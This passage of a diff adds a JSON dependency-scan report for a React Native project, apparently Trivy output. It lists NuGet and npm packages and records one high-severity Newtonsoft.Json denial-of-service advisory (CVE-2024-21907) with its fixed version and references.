"pkg:nuget/System.Diagnostics.Tracing@4.3.0", + "UID": "7d0b5d23411fbba6" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Globalization", + "Identifier": { + "PURL": "pkg:nuget/System.Globalization@4.3.0", + "UID": "b2ab88e303266347" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Globalization.Calendars", + "Identifier": { + "PURL": "pkg:nuget/System.Globalization.Calendars@4.3.0", + "UID": "5f6d78e6cde36564" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.IO", + "Identifier": { + "PURL": "pkg:nuget/System.IO@4.3.0", + "UID": "7bb2a00a6ec12a6d" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.IO.Compression", + "Identifier": { + "PURL": "pkg:nuget/System.IO.Compression@4.3.0", + "UID": "6cfe6309e55d4ffc" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.IO.Compression.ZipFile", + "Identifier": { + "PURL": "pkg:nuget/System.IO.Compression.ZipFile@4.3.0", + "UID": "ad1b71fdec5403a0" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.IO.FileSystem", + "Identifier": { + "PURL": "pkg:nuget/System.IO.FileSystem@4.3.0", + "UID": "d9b29f0a5739c33" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.IO.FileSystem.Primitives", + "Identifier": { + "PURL": "pkg:nuget/System.IO.FileSystem.Primitives@4.3.0", + "UID": "be005a28a479641f" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Linq", + "Identifier": { + "PURL": "pkg:nuget/System.Linq@4.3.0", + "UID": "d3535abbda091b93" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Linq.Expressions", + "Identifier": { + "PURL": "pkg:nuget/System.Linq.Expressions@4.3.0", + "UID": "97cad8a075602de1" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Net.Http", + "Identifier": { + "PURL": "pkg:nuget/System.Net.Http@4.3.4", + "UID": "83784403350659a4" + }, + "Version": "4.3.4", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Net.Primitives", + "Identifier": { + "PURL": "pkg:nuget/System.Net.Primitives@4.3.0", + "UID": "668c5d24897af98" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Net.Sockets", + "Identifier": { + "PURL": "pkg:nuget/System.Net.Sockets@4.3.0", + "UID": "d8bda2219253a0b1" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.ObjectModel", + "Identifier": { + "PURL": "pkg:nuget/System.ObjectModel@4.3.0", + "UID": "105338e28706b33a" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Reflection", + "Identifier": { + "PURL": "pkg:nuget/System.Reflection@4.3.0", + "UID": "fff9e418a8d7768a" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Reflection.Extensions", + "Identifier": { + "PURL": "pkg:nuget/System.Reflection.Extensions@4.3.0", + "UID": "24a70c725f0072c3" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Reflection.Primitives", + "Identifier": { + "PURL": "pkg:nuget/System.Reflection.Primitives@4.3.0", + "UID": "612588b9f47e0a3c" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Resources.ResourceManager", + "Identifier": { + "PURL": "pkg:nuget/System.Resources.ResourceManager@4.3.0", + "UID": "7bb72475985ce0c4" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime@4.3.0", + "UID": "eb21e14a34b26aa4" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime.Extensions", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime.Extensions@4.3.0", + "UID": "29a65e57fce0b6c9" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime.Handles", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime.Handles@4.3.0", + "UID": "444f2f86988ecfe9" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime.InteropServices", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime.InteropServices@4.3.0", + "UID": "2393e22d59f279a9" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime.InteropServices.RuntimeInformation", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime.InteropServices.RuntimeInformation@4.3.0", + "UID": "e865ccf21a190b08" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Runtime.Numerics", + "Identifier": { + "PURL": "pkg:nuget/System.Runtime.Numerics@4.3.0", + "UID": "71ad4b33ad6eb4c9" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Security.Cryptography.Algorithms", + "Identifier": { + "PURL": "pkg:nuget/System.Security.Cryptography.Algorithms@4.3.0", + "UID": "8b67e421a2d3394" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Security.Cryptography.Encoding", + "Identifier": { + "PURL": "pkg:nuget/System.Security.Cryptography.Encoding@4.3.0", + "UID": "906e3a52116c363c" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Security.Cryptography.Primitives", + "Identifier": { + "PURL": "pkg:nuget/System.Security.Cryptography.Primitives@4.3.0", + "UID": "f58a70acebaa0392" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Security.Cryptography.X509Certificates", + "Identifier": { + "PURL": "pkg:nuget/System.Security.Cryptography.X509Certificates@4.3.0", + "UID": "bd45ae8383a1c3c2" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Text.Encoding", + "Identifier": { + "PURL": "pkg:nuget/System.Text.Encoding@4.3.0", + "UID": "9b775c5e4db674d8" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Text.Encoding.Extensions", + "Identifier": { + "PURL": "pkg:nuget/System.Text.Encoding.Extensions@4.3.0", + "UID": "e59977bcf61f3d4b" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Text.RegularExpressions", + "Identifier": { + "PURL": "pkg:nuget/System.Text.RegularExpressions@4.3.1", + "UID": "6e09f07e852981c" + }, + "Version": "4.3.1", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Threading", + "Identifier": { + "PURL": "pkg:nuget/System.Threading@4.3.0", + "UID": "d5978c61633ebb9a" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Threading.Tasks", + "Identifier": { + "PURL": "pkg:nuget/System.Threading.Tasks@4.3.0", + "UID": "b8cc3d29decabb7a" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Threading.Timer", + "Identifier": { + "PURL": "pkg:nuget/System.Threading.Timer@4.3.0", + "UID": "d05049714aa3253a" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Xml.ReaderWriter", + "Identifier": { + "PURL": "pkg:nuget/System.Xml.ReaderWriter@4.3.0", + "UID": "4edf4892edf9b5a8" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + }, + { + "Name": "System.Xml.XDocument", + "Identifier": { + "PURL": "pkg:nuget/System.Xml.XDocument@4.3.0", + "UID": "ca14b6de031c68bd" + }, + "Version": "4.3.0", + "AnalyzedBy": "nuget" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2024-21907", + "VendorIDs": [ + "GHSA-5crp-9r3c-p9vr" + ], + "PkgName": "Newtonsoft.Json", + "PkgIdentifier": { + "PURL": "pkg:nuget/Newtonsoft.Json@9.0.1", + "UID": "4621b56ba40433" + }, + "InstalledVersion": "9.0.1", + "FixedVersion": "13.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-21907", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory NuGet", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anuget" + }, + "Fingerprint": "sha256:83b18238a577491bc73c58189090605c8b987b84c49cb989e11a215ff5653ea1", + "Title": "Improper Handling of Exceptional Conditions in Newtonsoft.Json", + "Description": "Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-755" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://alephsecurity.com/2018/10/22/StackOverflowException", + "https://alephsecurity.com/2018/10/22/StackOverflowException/", + "https://alephsecurity.com/vulns/aleph-2018004", + "https://github.com/JamesNK/Newtonsoft.Json", + "https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66", + "https://github.com/JamesNK/Newtonsoft.Json/issues/2457", + "https://github.com/JamesNK/Newtonsoft.Json/pull/2462", + "https://github.com/advisories/GHSA-5crp-9r3c-p9vr", + "https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678", + "https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr" + ], + "PublishedDate": "2024-01-03T16:15:08.793Z", + "LastModifiedDate": "2025-11-28T23:15:47.937Z" + } + ] + }, + { + "Target": "node_modules/react-native-svg/windows/RNSVG/packages.lock.json", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "ID": "Microsoft.UI.Xaml@2.8.0", + "Name": "Microsoft.UI.Xaml", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.8.0", + "UID": "66a2e80f259365b2" + }, + "Version": "2.8.0", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.Web.WebView2@1.0.1264.42" + ], + "Locations": [ + { + "StartLine": 5, + "EndLine": 13 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", + "UID": "347a26671a6b7b33" + }, + "Version": "2.0.230706.1", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 14, + "EndLine": 19 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.JavaScript.Hermes@0.1.23", + "Name": "Microsoft.JavaScript.Hermes", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.JavaScript.Hermes@0.1.23", + "UID": "40c44ff113e9e6e3" + }, + "Version": "0.1.23", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 25, + "EndLine": 29 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Web.WebView2@1.0.1264.42", + "Name": "Microsoft.Web.WebView2", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.1264.42", + "UID": "117308d8a5ad5a57" + }, + "Version": "1.0.1264.42", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 30, + "EndLine": 34 + }, + { + "StartLine": 71, + "EndLine": 75 + }, + { + "StartLine": 78, + "EndLine": 82 + }, + { + "StartLine": 85, + "EndLine": 89 + }, + { + "StartLine": 92, + "EndLine": 96 + }, + { + "StartLine": 99, + "EndLine": 103 + }, + { + "StartLine": 106, + "EndLine": 110 + }, + { + "StartLine": 113, + "EndLine": 117 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "boost@1.83.0", + "Name": "boost", + "Identifier": { + "PURL": "pkg:nuget/boost@1.83.0", + "UID": "6ad03ef5da326003" + }, + "Version": "1.83.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20, + "EndLine": 24 + } + ], + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-tts/windows/RNTTS/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "996e95c5ca3f698e" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-video/windows/ReactNativeVideoCPP/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "9b1357d64f041788" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-video/windows/ReactNativeVideoCPP61/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.190730.2", + "UID": "3e56bedf963d81a1" + }, + "Version": "2.0.190730.2", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "package-lock.json", + "Class": "lang-pkgs", + "Type": "npm", + "Packages": [ + { + "ID": "@babel/core@7.28.4", + "Name": "@babel/core", + "Identifier": { + "PURL": "pkg:npm/%40babel/core@7.28.4", + "UID": "24fba3b32aceebec" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/generator@7.28.3", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-module-transforms@7.28.3", + "@babel/helpers@7.28.4", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4", + "@jridgewell/remapping@2.3.5", + "convert-source-map@2.0.0", + "debug@4.4.3", + "gensync@1.0.0-beta.2", + "json5@2.2.3", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 162, + "EndLine": 191 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/runtime@7.28.4", + "Name": "@babel/runtime", + "Identifier": { + "PURL": "pkg:npm/%40babel/runtime@7.28.4", + "UID": "435faceec0358313" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2059, + "EndLine": 2067 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@dominicvonk/react-native-apk-installer@2.2.2", + "Name": "@dominicvonk/react-native-apk-installer", + "Identifier": { + "PURL": "pkg:npm/%40dominicvonk/react-native-apk-installer@2.2.2", + "UID": "ac83fa5f50422c94" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 2185, + "EndLine": 2194 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@mapbox/polyline@1.2.1", + "Name": "@mapbox/polyline", + "Identifier": { + "PURL": "pkg:npm/%40mapbox/polyline@1.2.1", + "UID": "2bc359775a0f8f7c" + }, + "Version": "1.2.1", + "Relationship": "direct", + "DependsOn": [ + "meow@9.0.0" + ], + "Locations": [ + { + "StartLine": 3878, + "EndLine": 3888 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-async-storage/async-storage@1.24.0", + "Name": "@react-native-async-storage/async-storage", + "Identifier": { + "PURL": "pkg:npm/%40react-native-async-storage/async-storage@1.24.0", + "UID": "e90469bc2ab47497" + }, + "Version": "1.24.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "merge-options@3.0.4", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 4047, + "EndLine": 4058 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-clipboard/clipboard@1.16.3", + "Name": "@react-native-clipboard/clipboard", + "Identifier": { + "PURL": "pkg:npm/%40react-native-clipboard/clipboard@1.16.3", + "UID": "be80c41c886aa739" + }, + "Version": "1.16.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4059, + "EndLine": 4081 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/checkbox@0.5.20", + "Name": "@react-native-community/checkbox", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/checkbox@0.5.20", + "UID": "9646190107e3249b" + }, + "Version": "0.5.20", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4082, + "EndLine": 4097 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli@20.0.0", + "Name": "@react-native-community/cli", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli@20.0.0", + "UID": "b11d5c85115cbb03" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-community/cli-clean@20.0.0", + "@react-native-community/cli-config@20.0.0", + "@react-native-community/cli-doctor@20.0.0", + "@react-native-community/cli-server-api@20.0.0", + "@react-native-community/cli-tools@20.0.0", + "@react-native-community/cli-types@20.0.0", + "chalk@4.1.2", + "commander@9.5.0", + "deepmerge@4.3.1", + "execa@5.1.1", + "find-up@5.0.0", + "fs-extra@8.1.0", + "graceful-fs@4.2.11", + "prompts@2.4.2", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 4098, + "EndLine": 4127 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-platform-android@20.0.0", + "Name": "@react-native-community/cli-platform-android", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-platform-android@20.0.0", + "UID": "d314a2169c6a33e0" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-community/cli-config-android@20.0.0", + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "logkitty@0.7.1" + ], + "Locations": [ + { + "StartLine": 4219, + "EndLine": 4232 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-platform-ios@20.0.0", + "Name": "@react-native-community/cli-platform-ios", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-platform-ios@20.0.0", + "UID": "580c92f53e79b3e1" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-community/cli-platform-apple@20.0.0" + ], + "Locations": [ + { + "StartLine": 4247, + "EndLine": 4256 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/datetimepicker@8.4.5", + "Name": "@react-native-community/datetimepicker", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/datetimepicker@8.4.5", + "UID": "a88e71e489a507d4" + }, + "Version": "8.4.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "invariant@2.2.4", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4344, + "EndLine": 4366 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/masked-view@0.1.11", + "Name": "@react-native-community/masked-view", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/masked-view@0.1.11", + "UID": "f1ea3d01a8361594" + }, + "Version": "0.1.11", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4367, + "EndLine": 4377 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/netinfo@11.4.1", + "Name": "@react-native-community/netinfo", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/netinfo@11.4.1", + "UID": "3874f3bd665e9130" + }, + "Version": "11.4.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 4378, + "EndLine": 4386 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/slider@5.0.1", + "Name": "@react-native-community/slider", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/slider@5.0.1", + "UID": "70671f3262b5e3ba" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 4401, + "EndLine": 4406 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-firebase/app@23.4.0", + "Name": "@react-native-firebase/app", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/app@23.4.0", + "UID": "508bb23c221d6eba" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "firebase@12.2.1", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4407, + "EndLine": 4425 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-firebase/crashlytics@23.4.0", + "Name": "@react-native-firebase/crashlytics", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/crashlytics@23.4.0", + "UID": "4cd9a9ec2d6500eb" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-firebase/app@23.4.0", + "stacktrace-js@2.0.2" + ], + "Locations": [ + { + "StartLine": 4426, + "EndLine": 4443 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-firebase/messaging@23.4.0", + "Name": "@react-native-firebase/messaging", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/messaging@23.4.0", + "UID": "6ab24e669f936e9" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native-firebase/app@23.4.0" + ], + "Locations": [ + { + "StartLine": 4444, + "EndLine": 4458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-picker/picker@2.11.2", + "Name": "@react-native-picker/picker", + "Identifier": { + "PURL": "pkg:npm/%40react-native-picker/picker@2.11.2", + "UID": "f73e91874270c29f" + }, + "Version": "2.11.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4459, + "EndLine": 4471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/babel-preset@0.81.0", + "Name": "@react-native/babel-preset", + "Identifier": { + "PURL": "pkg:npm/%40react-native/babel-preset@0.81.0", + "UID": "c795e926f6f6f448" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/plugin-proposal-export-default-from@7.27.1", + "@babel/plugin-syntax-dynamic-import@7.8.3", + "@babel/plugin-syntax-export-default-from@7.27.1", + "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "@babel/plugin-syntax-optional-chaining@7.8.3", + "@babel/plugin-transform-arrow-functions@7.27.1", + "@babel/plugin-transform-async-generator-functions@7.28.0", + "@babel/plugin-transform-async-to-generator@7.27.1", + "@babel/plugin-transform-block-scoping@7.28.4", + "@babel/plugin-transform-class-properties@7.27.1", + "@babel/plugin-transform-classes@7.28.4", + "@babel/plugin-transform-computed-properties@7.27.1", + "@babel/plugin-transform-destructuring@7.28.0", + "@babel/plugin-transform-flow-strip-types@7.27.1", + "@babel/plugin-transform-for-of@7.27.1", + "@babel/plugin-transform-function-name@7.27.1", + "@babel/plugin-transform-literals@7.27.1", + "@babel/plugin-transform-logical-assignment-operators@7.27.1", + "@babel/plugin-transform-modules-commonjs@7.27.1", + "@babel/plugin-transform-named-capturing-groups-regex@7.27.1", + "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "@babel/plugin-transform-numeric-separator@7.27.1", + "@babel/plugin-transform-object-rest-spread@7.28.4", + "@babel/plugin-transform-optional-catch-binding@7.27.1", + "@babel/plugin-transform-optional-chaining@7.27.1", + "@babel/plugin-transform-parameters@7.27.7", + "@babel/plugin-transform-private-methods@7.27.1", + "@babel/plugin-transform-private-property-in-object@7.27.1", + "@babel/plugin-transform-react-display-name@7.28.0", + "@babel/plugin-transform-react-jsx-self@7.27.1", + "@babel/plugin-transform-react-jsx-source@7.27.1", + "@babel/plugin-transform-react-jsx@7.27.1", + "@babel/plugin-transform-regenerator@7.28.4", + "@babel/plugin-transform-runtime@7.28.3", + "@babel/plugin-transform-shorthand-properties@7.27.1", + "@babel/plugin-transform-spread@7.27.1", + "@babel/plugin-transform-sticky-regex@7.27.1", + "@babel/plugin-transform-typescript@7.28.0", + "@babel/plugin-transform-unicode-regex@7.27.1", + "@babel/template@7.27.2", + "@react-native/babel-plugin-codegen@0.81.0", + "babel-plugin-syntax-hermes-parser@0.29.1", + "babel-plugin-transform-flow-enums@0.0.2", + "react-refresh@0.14.2" + ], + "Locations": [ + { + "StartLine": 4494, + "EndLine": 4552 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/metro-config@0.81.0", + "Name": "@react-native/metro-config", + "Identifier": { + "PURL": "pkg:npm/%40react-native/metro-config@0.81.0", + "UID": "59dfaa8a9bbb88da" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-native/js-polyfills@0.81.0", + "@react-native/metro-babel-transformer@0.81.0", + "metro-config@0.83.3", + "metro-runtime@0.83.3" + ], + "Locations": [ + { + "StartLine": 4744, + "EndLine": 4758 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/new-app-screen@0.81.0", + "Name": "@react-native/new-app-screen", + "Identifier": { + "PURL": "pkg:npm/%40react-native/new-app-screen@0.81.0", + "UID": "c8601f2af89c1006" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@types/react@19.2.2", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4759, + "EndLine": 4777 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/drawer@7.5.9", + "Name": "@react-navigation/drawer", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/drawer@7.5.9", + "UID": "c0afcefdfad52c5c" + }, + "Version": "7.5.9", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "@react-navigation/native@7.2.1", + "color@4.2.3", + "react-native-drawer-layout@4.1.13", + "react-native-gesture-handler@2.28.0", + "react-native-reanimated@4.3.0", + "react-native-safe-area-context@5.6.1", + "react-native-screens@4.16.0", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 4816, + "EndLine": 4836 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/material-top-tabs@7.4.22", + "Name": "@react-navigation/material-top-tabs", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/material-top-tabs@7.4.22", + "UID": "6a4d5521746ec923" + }, + "Version": "7.4.22", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "@react-navigation/native@7.2.1", + "color@4.2.3", + "react-native-pager-view@8.0.0", + "react-native-safe-area-context@5.6.1", + "react-native-tab-view@4.3.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4860, + "EndLine": 4877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/native@7.2.1", + "Name": "@react-navigation/native", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/native@7.2.1", + "UID": "9e0c1e63e42259b2" + }, + "Version": "7.2.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/core@7.17.1", + "escape-string-regexp@4.0.0", + "fast-deep-equal@3.1.3", + "nanoid@3.3.11", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 4878, + "EndLine": 4894 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/stack@7.4.9", + "Name": "@react-navigation/stack", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/stack@7.4.9", + "UID": "7e91d4aea4ddb58d" + }, + "Version": "7.4.9", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@react-navigation/elements@2.9.13", + "@react-navigation/native@7.2.1", + "color@4.2.3", + "react-native-gesture-handler@2.28.0", + "react-native-safe-area-context@5.6.1", + "react-native-screens@4.16.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + 